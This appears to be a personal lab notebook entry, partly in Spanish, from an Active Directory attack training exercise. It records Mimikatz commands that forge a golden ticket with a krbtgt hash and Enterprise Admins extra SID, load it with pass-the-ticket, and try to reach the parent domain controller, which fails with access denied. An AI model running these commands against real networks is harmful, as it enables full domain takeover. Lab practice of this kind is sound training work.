Learning Objective - 19
Child to Parent using krbtgt hash
Ejecutamos en el mimikatz utilizando el hash del krbtgt.
PS C:\AD\Tools\tickets> Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /sids:S-1-5-21-335606122-960912869-3279953914-519 /krbtgt:4e9815869d2090ccfca61c1fe0d23986 /ticket" "exit"'
.#####. mimikatz 2.2.0 (x64) #19041 Sep 20 2021 19:01:18
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz(powershell) # kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /sids:S-1-5-21-335606122-960912869-3279953914-519 /krbtgt:4e9815869d2090ccfca61c1fe0d23986 /ticket
User : Administrator
Domain : dollarcorp.moneycorp.local (DOLLARCORP)
SID : S-1-5-21-719815819-3726368948-3917688648
User Id : 500
Groups Id : *513 512 520 518 519
Extra SIDs: S-1-5-21-335606122-960912869-3279953914-519 ;
ServiceKey: 4e9815869d2090ccfca61c1fe0d23986 - rc4_hmac_nt
Lifetime : 3/4/2024 1:10:49 AM ; 3/2/2034 1:10:49 AM ; 3/2/2034 1:10:49 AM
-> Ticket : ticket.kirbi
* PAC generated
* PAC signed
* EncTicketPart generated
* EncTicketPart encrypted
* KrbCred generated
Final Ticket Saved to file !
mimikatz(powershell) # exit
Bye!
Luego cargamos el ticket.
PS C:\AD\Tools\tickets> Invoke-Mimikatz -Command '"kerberos::ptt ticket.kirbi"'
.#####. mimikatz 2.2.0 (x64) #19041 Sep 20 2021 19:01:18
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz(powershell) # kerberos::ptt ticket.kirbi
* File: 'ticket.kirbi': OK
PS C:\AD\Tools\tickets> klist
Current LogonId is 0:0xe922452
Cached Tickets: (1)
#0> Client: Administrator @ dollarcorp.moneycorp.local
Server: krbtgt/dollarcorp.moneycorp.local @ dollarcorp.moneycorp.local
KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
Ticket Flags 0x40e00000 -> forwardable renewable initial pre_authent
Start Time: 3/4/2024 1:10:49 (local)
End Time: 3/2/2034 1:10:49 (local)
Renew Time: 3/2/2034 1:10:49 (local)
Session Key Type: RSADSI RC4-HMAC(NT)
Cache Flags: 0x1 -> PRIMARY
Kdc Called:
PS C:\AD\Tools\tickets>no funciona :c, debo ver porque esta fallando, Tal vez envio correo.
C:\AD\Tools>klist
Current LogonId is 0:0x43d8c
Cached Tickets: (1)
#0> Client: Administrator @ dollarcorp.moneycorp.local
Server: krbtgt/dollarcorp.moneycorp.local @ dollarcorp.moneycorp.local
KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
Ticket Flags 0x40e00000 -> forwardable renewable initial pre_authent
Start Time: 3/4/2024 1:56:14 (local)
End Time: 3/2/2034 1:56:14 (local)
Renew Time: 3/2/2034 1:56:14 (local)
Session Key Type: RSADSI RC4-HMAC(NT)
Cache Flags: 0x1 -> PRIMARY
Kdc Called:
C:\AD\Tools>dir \\mcorp-dc.moneycorp.local\c$
Access is denied.
C:\AD\Tools>klist
Current LogonId is 0:0x43d8c
Cached Tickets: (0)
C:\AD\Tools>Last updated